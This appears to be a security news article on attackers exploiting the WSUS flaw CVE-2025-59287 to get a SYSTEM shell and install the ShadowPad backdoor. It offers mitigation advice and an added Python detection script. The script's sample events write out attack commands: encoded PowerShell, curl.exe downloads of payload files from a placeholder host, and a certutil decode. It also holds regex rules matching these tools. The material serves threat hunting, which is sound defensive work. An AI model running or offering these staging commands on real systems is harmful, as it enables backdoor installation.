The AhnLab Security Intelligence Center (ASEC) has uncovered an active exploitation campaign in which threat actors weaponized a newly disclosed remote code execution (RCE) vulnerability in Microsoft Windows Server Update Services (WSUS) to distribute ShadowPad, one of the most notorious backdoors linked to multiple Chinese state-aligned APT groups.
ShadowPad—first discovered in 2017—has been continuously updated and privately circulated among Chinese nation-state operators. It has been used in supply-chain intrusions, critical infrastructure breaches, and long-term espionage campaigns.
The timeline uncovered by ASEC shows a rapid weaponization cycle following the release of proof-of-concept exploit code.
ASEC reports: “After the proof-of-concept (PoC) exploit code for the vulnerability was publicly released, attackers quickly weaponized it to distribute ShadowPad malware via WSUS servers.”
Microsoft published its advisory on October 14, and by October 22, PoC code had been released publicly. ASEC’s telemetry detected PowerCat activity shortly afterward.
Attackers first targeted Windows Servers with WSUS enabled, leveraging the vulnerability to execute PowerShell commands.
The report states: “The attacker targeted Windows Servers with WSUS enabled, exploiting CVE-2025-59287 for initial access. They then used PowerCat… to obtain a system shell (CMD).”
The malicious command logged via AhnLab Smart Defense (ASD) infrastructure included:
This allowed attackers to gain a SYSTEM-level interactive shell.
On November 6, attackers exploited the same WSUS RCE again—this time to drop and decode ShadowPad components using Windows’ built-in tools.
ASEC details: “The threat actor… executed curl.exe and certutil.exe, which are legitimate Windows utilities, to install the ShadowPad malware.”
Downloaded components included:
- tmp.txt → later decoded via certutil into a .tmp file containing core ShadowPad data
- dll.txt
- exe.txt
ShadowPad rarely runs as a standalone binary. Instead, it hides behind a legitimate executable. The .tmp file contains encrypted backdoor configuration and operational modules.
ASEC concludes: “This vulnerability is critical because it allows remote code execution with system-level permission, significantly increasing the potential impact.”
Administrators of Windows Server environments running WSUS are urged to take immediate action:
- Apply Microsoft’s latest security update addressing CVE-2025-59287.
- Restrict WSUS access:
  - Only Microsoft Update servers should access WSUS.
  - Block inbound traffic on TCP 8530 and 8531 from all other sources.
- Audit for suspicious activity:
  - PowerShell, certutil.exe, curl.exe execution histories
  - Unusual network connection logs
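The audit step above can be turned into a small hunt over process-creation telemetry. The following is an added example written for this article, not code from ASEC or AhnLab: it runs three rules over a handful of constructed process-creation records (Windows Security Event ID 4688 / Sysmon Event ID 1 style fields) that mirror the tooling the report names, namely PowerShell with an encoded or hidden-window command line, curl.exe fetching a remote file, and certutil.exe decoding a downloaded .txt into a .tmp file. The hostnames, file paths, the 203.0.113.10 address (a TEST-NET range) and the exact command lines are assumptions made for the sample; only the tool names and the tmp.txt/dll.txt file names come from the report.

```python
import re

# Constructed sample process-creation records in the shape of Windows Security
# Event ID 4688 / Sysmon Event ID 1 fields. These are illustrative, not telemetry
# from the ASEC report; hostnames, paths and 203.0.113.10 are assumptions.
SAMPLE_EVENTS = [
    {"host": "wsus01", "user": r"NT AUTHORITY\SYSTEM",
     "cmdline": r"svchost.exe -k netsvcs -p -s Schedule"},
    {"host": "wsus01", "user": r"NT AUTHORITY\SYSTEM",
     "cmdline": r"powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"},
    {"host": "wsus01", "user": r"NT AUTHORITY\SYSTEM",
     "cmdline": r"curl.exe -o C:\Windows\Temp\tmp.txt http://203.0.113.10/tmp.txt"},
    {"host": "wsus01", "user": r"NT AUTHORITY\SYSTEM",
     "cmdline": r"certutil.exe -decode C:\Windows\Temp\tmp.txt C:\Windows\Temp\data.tmp"},
    {"host": "fs01", "user": r"CORP\jdoe",
     "cmdline": r"certutil.exe -verify C:\certs\server.cer"},   # benign certutil use
    {"host": "wsus01", "user": r"NT AUTHORITY\SYSTEM",
     "cmdline": r"curl.exe -o C:\Windows\Temp\dll.txt http://203.0.113.10/dll.txt"},
]

# Detection rules keyed on the living-off-the-land utilities named in the report.
RULES = [
    # certutil used to decode/fetch payloads rather than for certificate work
    ("certutil_decode",
     re.compile(r"\bcertutil(?:\.exe)?\b.*\s-(?:decode|decodehex|urlcache)\b", re.I)),
    # built-in curl pulling a file from a remote URL
    ("curl_download",
     re.compile(r"\bcurl(?:\.exe)?\b.*\s(?:https?|ftp)://", re.I)),
    # PowerShell launched with an encoded command or a hidden window
    ("powershell_encoded_or_hidden",
     re.compile(r"\bpowershell(?:\.exe)?\b.*?(?:-(?:e|ec|enc|encodedcommand)\s+\S+"
                r"|-(?:w|windowstyle)\s+hidden)", re.I)),
]

URL_HOST_RE = re.compile(r"(?:https?|ftp)://([^/\s:]+)", re.I)


def score_event(event):
    """Return the names of every rule whose pattern matches the command line."""
    return [name for name, rx in RULES if rx.search(event["cmdline"])]


def hunt(events):
    """Evaluate all events; return (findings, hosts_with_download_then_decode).

    A host that shows both a curl download and a certutil decode is escalated,
    since that pairing is the staging chain described for the ShadowPad drop.
    """
    findings = []
    rules_by_host = {}
    for ev in events:
        hits = score_event(ev)
        if not hits:
            continue
        findings.append({
            "host": ev["host"],
            "user": ev["user"],
            "rules": hits,
            # SYSTEM context matters here: the report describes a SYSTEM-level shell
            "system_context": ev["user"].upper().endswith("SYSTEM"),
            "cmdline": ev["cmdline"],
        })
        rules_by_host.setdefault(ev["host"], set()).update(hits)
    chains = sorted(h for h, names in rules_by_host.items()
                    if {"curl_download", "certutil_decode"} <= names)
    return findings, chains


def extract_remote_hosts(findings):
    """Collect the remote hosts contacted by flagged curl downloads (block-list candidates)."""
    hosts = set()
    for f in findings:
        if "curl_download" in f["rules"]:
            hosts.update(m.group(1) for m in URL_HOST_RE.finditer(f["cmdline"]))
    return hosts


if __name__ == "__main__":
    found, escalated = hunt(SAMPLE_EVENTS)
    for f in found:
        flag = "SYSTEM" if f["system_context"] else "user"
        print(f"[{f['host']}] ({flag}) {', '.join(f['rules'])}: {f['cmdline']}")
    print("download-then-decode chain on:", escalated)
    print("remote hosts to review:", sorted(extract_remote_hosts(found)))
```

In a real environment the same three patterns are applied to the CommandLine field of 4688 events (which requires process command-line auditing to be enabled) or Sysmon Event ID 1, and the per-host escalation is what separates a lone administrative certutil invocation from the download-then-decode sequence that preceded the ShadowPad installation.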